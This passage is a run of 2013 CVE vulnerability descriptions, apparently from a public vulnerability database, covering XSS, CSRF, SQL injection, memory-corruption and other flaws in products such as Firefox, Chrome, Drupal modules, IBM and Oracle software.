remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-3055] Lexmark Markvision Enterprise before 1.8 provides a diagnostic interface on TCP port 9789, which allows remote attackers to execute arbitrary code, change the configuration, or obtain sensitive fleet-management information via unspecified vectors. [CVE-2013-3035] The IPv6 implementation in the inet subsystem in IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02, allows remote attackers to cause a denial of service (system hang) via a crafted packet to an IPv6 interface. [CVE-2013-3032] Cross-site scripting (XSS) vulnerability in the MIME e-mail functionality in iNotes in IBM Domino 9.0 before IF3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka SPR PTHN986NAA. [CVE-2013-3028] Multiple buffer overflows in mqm programs in IBM WebSphere MQ 7.0.x before 7.0.1.11, 7.1.x before 7.1.0.3, and 7.5.x before 7.5.0.2 on non-Windows platforms allow local users to gain privileges via unspecified vectors. [CVE-2013-3027] Integer overflow in the DWA9W ActiveX control in iNotes in IBM Domino 9.0 before IF3 allows remote attackers to execute arbitrary code via a crafted web page, aka SPR PTHN97XHFW. [CVE-2013-3026] Buffer overflow in the Lotus Quickr for Domino ActiveX control in qp2.cab in IBM Lotus Quickr 8.1 before FP 8.1.0.32-001a, 8.2 before FP 8.2.0.28-001a, and 8.5.1 before FP 8.5.1.39-002a for Domino allows remote attackers to execute arbitrary code via a crafted web site. [CVE-2013-2994] IBM WebSphere Commerce 7.0 Feature Pack 4 and Feature Pack 5 incorrectly maintains a valid session after unspecified interaction with REST services, which allows remote attackers to issue REST requests in the context of an arbitrary user's active session via unknown vectors. [CVE-2013-2993] IBM WebSphere Commerce 6.x through 6.0.0.11 and 7.x through 7.0.0.7 does not properly perform authentication for unspecified web services, which allows remote attackers to issue requests in the context of an arbitrary user's active session via unknown vectors. [CVE-2013-2983] Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling File Gateway 2.2 and Sterling B2B Integrator allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2013-0468. [CVE-2013-2981] Directory traversal vulnerability in the Web Console in IBM Data Studio 3.1.0 and 3.1.1 allows remote attackers to read arbitrary files via unspecified vectors. [CVE-2013-2980] Cross-site request forgery (CSRF) vulnerability in the Web Console in IBM Data Studio 3.1.0 and 3.1.1 allows remote attackers to hijack the authentication of arbitrary users for requests that access monitored database information. [CVE-2013-2969] Cross-site scripting (XSS) vulnerability in IBM Sterling Control Center (SCC) 5.2 before 5.2.0.9, 5.3 before 5.3.0.4, and 5.4 through 5.4.0.1 allows remote authenticated users to inject arbitrary web script or HTML via vectors involving invalid characters. [CVE-2013-2961] The internal web server in the Basic Services component in IBM Tivoli Monitoring (ITM) 6.2.0 through FP3, 6.2.1 through FP4, 6.2.2 through FP9, and 6.2.3 before FP3, as used in IBM Application Manager for Smart Business (formerly Tivoli Foundations Application Manager) 1.2.1 before 1.2.1.0-TIV-IAMSB-FP0004 and other products, allows remote attackers to perform unspecified redirection of HTTP requests, and bypass the proxy-server configuration, via crafted HTTP traffic. [CVE-2013-2957] Cross-site scripting (XSS) vulnerability in IBM InfoSphere Optim Data Growth for Oracle E-Business Suite 6.x, 7.x, and 9.x before 9.1.0.3 allows remote authenticated users to inject arbitrary web script or HTML via a crafted URL. [CVE-2013-2955] Cross-site scripting (XSS) vulnerability in IBM InfoSphere Optim Data Growth for Oracle E-Business Suite 6.x, 7.x, and 9.x before 9.1.0.3 allows remote authenticated users to inject arbitrary web script or HTML via a crafted URL, related to a stored XSS issue. [CVE-2013-2950] CRLF injection vulnerability in IBM WebSphere Portal 6.1.0.x before 6.1.0.3 CF26, 6.1.5.x before 6.1.5 CF26, 7.0.0.x before 7.0.0.2 CF21, and 8.0.0.x through 8.0.0.1 CF5, when home substitution (aka uri.home.substitution) is enabled, allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via unspecified vectors. [CVE-2013-2881] Google Chrome before 28.0.1500.95 does not properly handle frames, which allows remote attackers to bypass the Same Origin Policy via a crafted web site. [CVE-2013-2879] Google Chrome before 28.0.1500.71 does not properly determine the circumstances in which a renderer process can be considered a trusted process for sign-in and subsequent sync operations, which makes it easier for remote attackers to conduct phishing attacks via a crafted web site. [CVE-2013-2867] Google Chrome before 28.0.1500.71 does not properly prevent pop-under windows, which allows remote attackers to have an unspecified impact via a crafted web site. [CVE-2013-2849] Multiple cross-site scripting (XSS) vulnerabilities in Google Chrome before 27.0.1453.93 allow user-assisted remote attackers to inject arbitrary web script or HTML via vectors involving a (1) drag-and-drop or (2) copy-and-paste operation. [CVE-2013-2845] The Web Audio implementation in Google Chrome before 27.0.1453.93 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors. [CVE-2013-2835] Google Chrome OS before 26.0.1410.57 does not properly enforce origin restrictions for the O3D and Google Talk plug-ins, which allows remote attackers to bypass the domain-whitelist protection mechanism via a crafted web site, a different vulnerability than CVE-2013-2834. [CVE-2013-2834] Google Chrome OS before 26.0.1410.57 does not properly enforce origin restrictions for the O3D and Google Talk plug-ins, which allows remote attackers to bypass the domain-whitelist protection mechanism via a crafted web site, a different vulnerability than CVE-2013-2835. [CVE-2013-2785] Multiple buffer overflows in CimWebServer.exe in the WebView component in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY before 8.0 SIM 27, 8.1 before SIM 25, and 8.2 before SIM 19, and Proficy Process Systems with CIMPLICITY, allow remote attackers to execute arbitrary code via crafted data in packets to TCP port 10212, aka ZDI-CAN-1621 and ZDI-CAN-1624. [CVE-2013-2766] Cross-site scripting (XSS) vulnerability in Splunk Web in Splunk 4.3.0 through 4.3.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-2715] Cross-site scripting (XSS) vulnerability in the admin view in the Search API (search_api) module 7.x-1.x before 7.x-1.4 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via a crafted field name. [CVE-2013-2696] Cross-site request forgery (CSRF) vulnerability in the All in One Webmaster plugin before 8.2.4 for WordPress allows remote attackers to hijack the authentication of arbitrary users for requests that insert XSS sequences. [CVE-2013-2690] SQL injection vulnerability in index.php in Synchroweb Technology SynConnect 2.0 allows remote attackers to execute arbitrary SQL commands via the loginid parameter in a logoff action. [CVE-2013-2630] Cross-site scripting (XSS) vulnerability in CA Service Desk Manager 12.5 through 12.7 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2013-2551] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1308 and CVE-2013-1309. [CVE-2013-2501] Cross-site scripting (XSS) vulnerability in the Terillion Reviews plugin before 1.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ProfileId field. [CVE-2013-2413] Unspecified vulnerability in the Siebel Enterprise Application Integration component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Web Services. [CVE-2013-2411] Unspecified vulnerability in the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 7.0, 8.1, and 8.2 allows remote attackers to affect integrity via unknown vectors related to Web Access. [CVE-2013-2405] Unspecified vulnerability in the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 7.0, 8.1, and 8.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Web Access. [CVE-2013-2403] Unspecified vulnerability in the Siebel Enterprise Application Integration component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Web Services, a different vulnerability than CVE-2013-0416. [CVE-2013-2390] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2, 10.3.5, 10.3.6, and 12.1.1 allows remote attackers to affect integrity via unknown vectors related to WebLogic Console, a different vulnerability than CVE-2013-1504. [CVE-2013-2373] The Engine in TIBCO Spotfire Web Player 3.3.x before 3.3.3, 4.0.x before 4.0.3, 4.5.x before 4.5.1, and 5.0.x before 5.0.1 does not properly implement access control, which allows remote attackers to obtain sensitive information or modify data via unspecified vectors. [CVE-2013-2372] Cross-site scripting (XSS) vulnerability in the Engine in TIBCO Spotfire Web Player 3.3.x before 3.3.3, 4.0.x before 4.0.3, 4.5.x before 4.5.1, and 5.0.x before 5.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-2371] The Web API in the Statistics Server in TIBCO Spotfire Statistics Services 3.3.x before 3.3.1, 4.5.x before 4.5.1, and 5.0.x before 5.0.1 allows remote attackers to obtain sensitive information via an unspecified HTTP request. [CVE-2013-2364] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 7.2.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-2361] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 7.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-2337] Cross-site scripting (XSS) vulnerability in HP Service Manager 7.11, 9.21, 9.30, and 9.31, and ServiceCenter 6.2.8, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-2321] Cross-site scripting (XSS) vulnerability in HP Service Manager Web Tier 9.31 before 9.31.2004 p2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-2314] Cross-site scripting (XSS) vulnerability in the adminAuthorization function in data/class/helper/SC_Helper_Session.php in LOCKON EC-CUBE 2.11.0 through 2.12.3enP2 allows remote attackers to inject arbitrary web script or HTML via a crafted URL associated with the management screen. [CVE-2013-2313] Session fixation vulnerability in LOCKON EC-CUBE 2.11.0 through 2.12.3enP2 allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2013-2312] Cross-site scripting (XSS) vulnerability in the shopping-cart screen in LOCKON EC-CUBE 2.11.0 through 2.12.3enP2 allows remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2013-2311] Cross-site scripting (XSS) vulnerability in static/js/share.js (aka the social bookmarking widget) in Web2py before 2.3.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-2309] Cross-site scripting (XSS) vulnerability in the management screen in OpenPNE 3.4.x before 3.4.21.1, 3.6.x before 3.6.9.1, and 3.8.x before 3.8.5.1 allows remote attackers to inject arbitrary web script or HTML via vectors involving the "mobile version color scheme." [CVE-2013-2307] The Yahoo! Browser application before 1.4.3 for Android allows remote attackers to spoof the address bar via a crafted web site. [CVE-2013-2306] The jigbrowser+ application before 1.6.4 for Android does not properly open windows, which allows remote attackers to spoof the address bar via a crafted web site. [CVE-2013-2304] The Sleipnir Mobile application 2.8.0 and earlier and Sleipnir Mobile Black Edition application 2.8.0 and earlier for Android allow remote attackers to load arbitrary Extension APIs, and trigger downloads or obtain sensitive HTTP response-body information, via a crafted web page. [CVE-2013-2302] TransWARE Active! mail 6, when an external public interface is used, allows local users to obtain sensitive information belonging to arbitrary users by leveraging shell access, as demonstrated by a TELNET or SSH session to the server. [CVE-2013-2290] Cross-site scripting (XSS) vulnerability in the dashboard of the ArubaOS Administration WebUI in Aruba Networks ArubaOS 6.2.x before 6.2.0.3, 6.1.3.x before 6.1.3.7, 6.1.x-FIPS before 6.1.4.3-FIPS, and 6.1.x-AirGroup before 6.1.3.6-AirGroup, as used by Mobility Controller, allows remote wireless access points to inject arbitrary web script or HTML via a crafted SSID. [CVE-2013-2268] Unspecified vulnerability in the MathML implementation in WebKit in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, has unknown impact and remote attack vectors, related to a "high severity security issue." [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix. [CVE-2013-2244] Multiple cross-site scripting (XSS) vulnerabilities in lib/conditionlib.php in Moodle 2.4.x before 2.4.5 and 2.5.x before 2.5.1 allow remote attackers to inject arbitrary web script or HTML via the conditional access rule value of a user field. [CVE-2013-2237] The key_notify_policy_flush function in net/key/af_key.c in the Linux kernel before 3.9 does not initialize a certain structure member, which allows local users to obtain sensitive information from kernel heap memory by reading a broadcast message from the notify_policy interface of an IPSec key_socket. [CVE-2013-2234] The (1) key_notify_sa_flush and (2) key_notify_policy_flush functions in net/key/af_key.c in the Linux kernel before 3.10 do not initialize certain structure members, which allows local users to obtain sensitive information from kernel heap memory by reading a broadcast message from the notify interface of an IPSec key_socket. [CVE-2013-2232] The ip6_sk_dst_check function in net/ipv6/ip6_output.c in the Linux kernel before 3.10 allows local users to cause a denial of service (system crash) by using an AF_INET6 socket for a connection to an IPv4 interface. [CVE-2013-2209] Cross-site scripting (XSS) vulnerability in the auto-complete widget in htdocs/media/rb/js/reviews.js in Review Board 1.6.x before 1.6.17 and 1.7.x before 1.7.10 allows remote attackers to inject arbitrary web script or HTML via a full name. [CVE-2013-2205] The default configuration of SWFUpload in WordPress before 3.5.2 has an unrestrictive security.allowDomain setting, which allows remote attackers to bypass the Same Origin Policy and conduct cross-site scripting (XSS) attacks via a crafted web site. [CVE-2013-2201] Multiple cross-site scripting (XSS) vulnerabilities in WordPress before 3.5.2 allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) uploads of media files, (2) editing of media files, (3) installation of plugins, (4) updates to plugins, (5) installation of themes, or (6) updates to themes. [CVE-2013-2181] Cross-site scripting (XSS) vulnerability in the Directory Listing plugin in Monkey HTTP Daemon (monkeyd) 1.2.2 allows attackers to inject arbitrary web script or HTML via a file name. [CVE-2013-2177] Cross-site scripting (XSS) vulnerability in the Display Suite module 7.x-1.x before 7.x-1.7 and 7.x-2.x before 7.x-2.3 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via an entity bundle label. [CVE-2013-2165] ResourceBuilderImpl.java in the RichFaces 3.x through 5.x implementation in Red Hat JBoss Web Framework Kit before 2.3.0, Red Hat JBoss Web Platform through 5.2.0, Red Hat JBoss Enterprise Application Platform through 4.3.0 CP10 and 5.x through 5.2.0, Red Hat JBoss BRMS through 5.3.1, Red Hat JBoss SOA Platform through 4.3.0 CP05 and 5.x through 5.3.1, Red Hat JBoss Portal through 4.3 CP07 and 5.x through 5.2.2, and Red Hat JBoss Operations Network through 2.4.2 and 3.x through 3.1.2 does not restrict the classes for which deserialization methods can be called, which allows remote attackers to execute arbitrary code via crafted serialized data. [CVE-2013-2129] Cross-site scripting (XSS) vulnerability in the Webform module 6.x-3.x before 6.x-3.19 for Drupal allows remote authenticated users with the "edit own webform content" or "edit all webform content" permissions to inject arbitrary web script or HTML via a component label. [CVE-2013-2036] Cross-site scripting (XSS) vulnerability in the Filebrowser module 6.x-2.x before 6.x-2.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to "lists of files." [CVE-2013-1976] The (1) tomcat5, (2) tomcat6, and (3) tomcat7 init scripts, as used in the RPM distribution of Tomcat for JBoss Enterprise Web Server 1.0.2 and 2.0.0, and Red Hat Enterprise Linux 5 and 6, allows local users to change the ownership of arbitrary files via a symlink attack on (a) tomcat5-initd.log, (b) tomcat6-initd.log, (c) catalina.out, or (d) tomcat7-initd.log. [CVE-2013-1971] Cross-site scripting (XSS) vulnerability in the MP3 Player module for Drupal 6.x allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via the file name of a MP3 file. [CVE-2013-1955] Multiple cross-site scripting (XSS) vulnerabilities in (1) index.php and (2) datePicker.php in Easy PHP Calendar 6.x and 7.x before 7.0.13 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-1937] Multiple cross-site scripting (XSS) vulnerabilities in tbl_gis_visualization.php in phpMyAdmin 3.5.x before 3.5.8 might allow remote attackers to inject arbitrary web script or HTML via the (1) visualizationSettings[width] or (2) visualizationSettings[height] parameter. [CVE-2013-1927] The IcedTea-Web plugin before 1.2.3 and 1.3.x before 1.3.2 allows remote attackers to execute arbitrary code via a crafted file that validates as both a GIF and a Java JAR file, aka "GIFAR." [CVE-2013-1926] The IcedTea-Web plugin before 1.2.3 and 1.3.x before 1.3.2 uses the same class loader for applets with the same codebase path but from different domains, which allows remote attackers to obtain sensitive information or possibly alter other applets via a crafted applet. [CVE-2013-1906] Cross-site scripting (XSS) vulnerability in the Rules module 7.x-2.x before 7.x-2.3 for Drupal allows remote authenticated users with the "administer rules" permission to inject arbitrary web script or HTML via a rule tag. [CVE-2013-1905] Cross-site scripting (XSS) vulnerability in the Zero Point theme 7.x-1.x before 7.x-1.9 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-1887] Multiple cross-site scripting (XSS) vulnerabilities in the Views module 7.x-3.x before 7.x-3.6 for Drupal allow remote authenticated users with certain permissions to inject arbitrary web script or HTML via certain view configuration fields. [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message." [CVE-2013-1844] Cross-site scripting (XSS) vulnerability in Piwik before 1.11 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-1843] Open redirect vulnerability in the Access tracking mechanism in TYPO3 4.5.x before 4.5.24, 4.6.x before 4.6.17, 4.7.x before 4.7.9, and 6.0.x before 6.0.3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2013-1836] Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 does not properly manage privileges for WebDAV repositories, which allows remote authenticated users to read, modify, or delete arbitrary site-wide repositories by leveraging certain read access. [CVE-2013-1833] Multiple cross-site scripting (XSS) vulnerabilities in the File Picker module in Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 allow remote authenticated users to inject arbitrary web script or HTML via a crafted filename. [CVE-2013-1832] repository/webdav/lib.php in Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 includes the WebDAV password in the configuration form, which allows remote authenticated administrators to obtain sensitive information by configuring an instance. [CVE-2013-1823] Cross-site scripting (XSS) vulnerability in the Notifications form in Red Hat Subscription Asset Manager before 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the username field. [CVE-2013-1808] Cross-site scripting (XSS) vulnerability in ZeroClipboard.swf and ZeroClipboard10.swf in ZeroClipboard before 1.0.8, as used in em-shorty, RepRapCalculator, Fulcrum, Django, aCMS, and other products, allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this is might be the same vulnerability as CVE-2013-1463. If so, it is likely that CVE-2013-1463 will be REJECTed. [CVE-2013-1787] Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the Simple Corporate theme before 7.x-1.4 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-1786] Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the Company theme before 7.x-1.4 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-1785] Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the Premium Responsive theme before 7.x-1.6 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-1784] Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the Clean Theme before 7.x-1.3 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-1783] Cross-site scripting (XSS) vulnerability in the 3 slide gallery in page--front.tpl.php in the Business theme before 7.x-1.8 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-1782] Cross-site scripting (XSS) vulnerability in the Responsive Blog Theme 7.x-1.x before 7.x-1.6 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via vectors related to social icons. [CVE-2013-1781] Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the Professional theme before 7.x-1.4 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-1780] Cross-site scripting (XSS) vulnerability in the Best Responsive Theme 7.x-1.x before 7.x-1.1 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via vectors related to social icons. [CVE-2013-1779] Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the Fresh theme before 7.x-1.4 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-1778] Cross-site scripting (XSS) vulnerability in the Creative Theme 7.x-1.x before 7.x-1.2 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via vectors related to social icons. [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object. [CVE-2013-1749] Cross-site scripting (XSS) vulnerability in edit.php in PHP Address Book 8.2.5 allows user-assisted remote attackers to inject arbitrary web script or HTML via the Address field. [CVE-2013-1714] The Web Workers implementation in Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbird before 17.0.8, Thunderbird ESR 17.x before 17.0.8, and SeaMonkey before 2.20 does not properly restrict XMLHttpRequest calls, which allows remote attackers to bypass the Same Origin Policy and conduct cross-site scripting (XSS) attacks via unspecified vectors. [CVE-2013-1713] Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbird before 17.0.8, Thunderbird ESR 17.x before 17.0.8, and SeaMonkey before 2.20 use an incorrect URI within unspecified comparisons during enforcement of the Same Origin Policy, which allows remote attackers to conduct cross-site scripting (XSS) attacks or install arbitrary add-ons via a crafted web site. [CVE-2013-1698] The getUserMedia permission implementation in Mozilla Firefox before 22.0 references the URL of a top-level document instead of the URL of a specific page, which makes it easier for remote attackers to trick users into permitting camera or microphone access via a crafted web site that uses IFRAME elements. [CVE-2013-1697] The XrayWrapper implementation in Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 does not properly restrict use of DefaultValue for method calls, which allows remote attackers to execute arbitrary JavaScript code with chrome privileges via a crafted web site that triggers use of a user-defined (1) toString or (2) valueOf method. [CVE-2013-1696] Mozilla Firefox before 22.0 does not properly enforce the X-Frame-Options protection mechanism, which allows remote attackers to conduct clickjacking attacks via a crafted web site that uses the HTTP server push feature with multipart responses. [CVE-2013-1692] Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not prevent the inclusion of body data in an XMLHttpRequest HEAD request, which makes it easier for remote attackers to conduct cross-site request forgery (CSRF) attacks via a crafted web site. [CVE-2013-1690] Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly handle onreadystatechange events in conjunction with page reloading, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site that triggers an attempt to execute data at an unmapped memory location. [CVE-2013-1688] The Profiler implementation in Mozilla Firefox before 22.0 parses untrusted data during UI rendering, which allows user-assisted remote attackers to execute arbitrary JavaScript code via a crafted web site. [CVE-2013-1687] The System Only Wrapper (SOW) and Chrome Object Wrapper (COW) implementations in Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly restrict XBL user-defined functions, which allows remote attackers to execute arbitrary JavaScript code with chrome privileges, or conduct cross-site scripting (XSS) attacks, via a crafted web site. [CVE-2013-1685] Use-after-free vulnerability in the nsIDocument::GetRootElement function in Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted web site. [CVE-2013-1684] Use-after-free vulnerability in the mozilla::dom::HTMLMediaElement::LookupMediaElementURITable function in Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted web site. [CVE-2013-1675] Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 do not properly initialize data structures for the nsDOMSVGZoomEvent::mPreviousScale and nsDOMSVGZoomEvent::mNewScale functions, which allows remote attackers to obtain sensitive information from process memory via a crafted web site. [CVE-2013-1671] Mozilla Firefox before 21.0 does not properly implement the INPUT element, which allows remote attackers to obtain the full pathname via a crafted web site. [CVE-2013-1670] The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 does not prevent acquisition of chrome privileges during calls to content level constructors, which allows remote attackers to bypass certain read-only restrictions and conduct cross-site scripting (XSS) attacks via a crafted web site. [CVE-2013-1639] Opera before 12.13 does not send CORS preflight requests in all required cases, which allows remote attackers to bypass a CSRF protection mechanism via a crafted web site that triggers a CORS request. [CVE-2013-1627] Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function. [CVE-2013-1617] Multiple SQL injection vulnerabilities in the management console on the Symantec Web Gateway (SWG) appliance before 5.1.1 allow remote authenticated administrators to execute arbitrary SQL commands via unspecified vectors. [CVE-2013-1616] The management console on the Symantec Web Gateway (SWG) appliance before 5.1.1 allows remote attackers to execute arbitrary commands by injecting a command into an application script. [CVE-2013-1615] The management console (aka Java console) on the Symantec Security Information Manager (SSIM) appliance 4.7.x and 4.8.x before 4.8.1 allows remote attackers to obtain sensitive information via unspecified web-GUI API calls. [CVE-2013-1614] Multiple cross-site scripting (XSS) vulnerabilities in the management console (aka Java console) on the Symantec Security Information Manager (SSIM) appliance 4.7.x and 4.8.x before 4.8.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-1559] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1 and 11.1.1.6.0 allows remote authenticated users to affect availability via unknown vectors related to Content Server. [CVE-2013-1553] Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security. [CVE-2013-1545] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 10.1.3.5, 11.1.1.5.0, and 11.1.1.6.0 allows remote attackers to affect availability via unknown vectors related to Web Listener. [CVE-2013-1529] Unspecified vulnerability in the Oracle WebCenter Interaction component in Oracle Fusion Middleware 6.5.1 and 10.3.3.0 allows remote attackers to affect integrity via unknown vectors related to Image Service. [CVE-2013-1522] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1 and 11.1.1.6.0 allows remote attackers to affect integrity via unknown vectors related to Content Server. [CVE-2013-1516] Unspecified vulnerability in the Oracle WebCenter Capture component in Oracle Fusion Middleware 10.1.3.5.1 allows remote authenticated users to affect availability via unknown vectors related to Import Server. [CVE-2013-1515] Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Sun Middleware Products 3.0.1 and 3.1.2 allows remote attackers to affect integrity via vectors related to ADMIN Interface. [CVE-2013-1509] Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 7.6.2, 11.1.1.6.0, and 11.1.1.6.1 allows remote authenticated users to affect integrity via unknown vectors related to WebCenter Sites. [CVE-2013-1508] Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Sun Middleware Products 3.0.1 and 3.1.2 allows remote attackers to affect integrity via vectors related to REST Interface. [CVE-2013-1504] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2, 10.3.5, 10.3.6, and 12.1.1 allows remote attackers to affect integrity via unknown vectors related to WebLogic Console, a different vulnerability than CVE-2013-2390. [CVE-2013-1503] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1 and 11.1.1.6.0 allows remote authenticated users to affect integrity via unknown vectors related to Content Server. [CVE-2013-1497] Unspecified vulnerability in the Oracle COREid Access component in Oracle Fusion Middleware 10.1.4.3.0 allows remote attackers to affect integrity via unknown vectors related to WebGate - WebServer plugin. [CVE-2013-1471] Multiple cross-site scripting (XSS) vulnerabilities in admin/FEAdmin.html in Fortinet FortiMail before 4.3.4 on FortiMail Identity-Based Encryption (IBE) appliances allow user-assisted remote attackers to inject arbitrary web script or HTML via (1) the Add field for the Black List under Antispam Management User Preferences or (2) the User name field for the Personal Black/White List in the AntiSpam section. [CVE-2013-1464] Cross-site scripting (XSS) vulnerability in ssets/player.swf in the Audio Player plugin before 2.0.4.6 for Wordpress allows remote attackers to inject arbitrary web script or HTML via the playerID parameter. [CVE-2013-1463] Cross-site scripting (XSS) vulnerability in js/tabletools/zeroclipboard.swf in the WP-Table Reloaded module before 1.9.4 for Wordpress allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this might be the same vulnerability as CVE-2013-1808. If so, it is likely that CVE-2013-1463 will be REJECTed. [CVE-2013-1451] Microsoft Internet Explorer 8 and 9, when the Proxy Settings 